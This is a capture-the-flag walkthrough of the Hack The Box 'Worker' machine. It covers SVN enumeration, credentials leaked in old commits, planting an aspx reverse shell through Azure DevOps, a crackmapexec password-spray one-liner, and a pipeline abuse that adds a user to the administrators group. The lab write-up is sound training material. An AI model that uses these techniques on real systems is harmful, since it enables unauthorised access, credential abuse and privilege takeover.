Worker - Easy Box running on Linux. Enumeration through SVN. DevOps on Azure! :)
ENUMERATION
NMAP
Let’s start NMAP first:
1
2
3
4
5
6
7
8
9
Nmap scan report for 10.10.10.203
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
3690/tcp open svnserve Subversion
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 17 12:24:15 2021 -- 1 IP address (1 host up) scanned in 13.09 seconds
There is also port 80 running but for some reason didn’t get scanned by NMAP. It’s however nothing there so let’s enumerate that SVN (subversion)
SVN
1
2
3
4
5
6
7
8
9
10
11
luka@kali:~/htb/worker$ nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 10.10.10.203
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-17 12:31 CET
Nmap scan report for 10.10.10.203
Host is up (0.034s latency).
PORT STATE SERVICE
3690/tcp open svn
| svn-brute:
|_ Anonymous SVN detected, no authentication needed
Nmap done: 1 IP address (1 host up) scanned in 11.81 seconds
Subversion is repository like Github commit history just simpler and running on Apache. Link https://en.wikipedia.org/wiki/Apache_Subversion
.png)
So let’s see what we can find:
1
svn ls svn://10.10.10.203/
.png)
So let’s read the moved.txt
.png)
EXPLOITATION
SVN Enumeration (continued)
Add devops.worker.htb to /etc/hosts and try to connect:
.png)
Without any password we cannot continue. There is also dimension.worker.htb but is just a static page.
Since SVN lets us see if there are any older versions let’s do that (usinf -r 1)
.png)
We can download those with checkout using -r argument
1
svn checkout -r 2 svn://10.10.10.203
There were some credentials found in deploy.ps1
.png)
Using that credentials we can login to devops.worker.htb
.png)
Azure Dev Ops
Enumeration didn’t bring much apart from finding more than repos in SmartHotel360 Project
There is a way to inject shell (aspx) to the repo and call that file available on that particular subdomain(alpha, spectral,…).
So let’s upload shell:
.png)
And commit
.png)
Create pull request
.png)
I had to add some work items (just randomly typing them) otherwise “complete didn’t work”
If everything worked correctly, we should see the file (remember to visit the right repository!)
1
curl http://spectral.worker.htb/win-rev-shell.aspx
Shell was popped
.png)
PRIVILEGE ESCALATION
Manual Enumeration
As expected it is low privileged shell with some privileges!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
I didn’t try different potatoes (rogue,Juicy) since that is usualy unintended way to escalate privileges.
There is other share on the system
.png)
After searching for a while following file was found
.png)
List of usernames/passwords was downloaded and will be used in test with crackmapexecs winrm module. I is slow but it works! :)
1
cat credz | tr -d " " | awk -F"=" '{print "crackmapexec winrm 10.10.10.203 -u "$1 " -p "$2 " --local-auth -x whoami"}'
The user that worked with that password spray attempt done above was robinsl
.png)
There is not much that that user can do on the system but his credentials work for devops and it seems to have another project assigned.
.png)
Azure Dev Ops #2
Privilege escalation seems that has to be done almost same attack through Azure Dev Ops it will however be different. I couldn’t find a way to interact with repos directly like before but there is another way to execute code - through pipelines.
Azure Repos Git > PartsUnlimited > Starter Pipeline
.png)
Here we can add commands that will be triggered with whichever user has run the service (hopefully SYSTEM ;) ).
.png)
I’ve decided to add robinsl to administrators group since it is more persistent way of escalating the privileges as reverse shell.
.png)
then delete pool and create a new branch.
If everything has worked correctly user robinsl should have been added to “adminstrators” localgroup.
.png)
And yes. It has worked!
.png)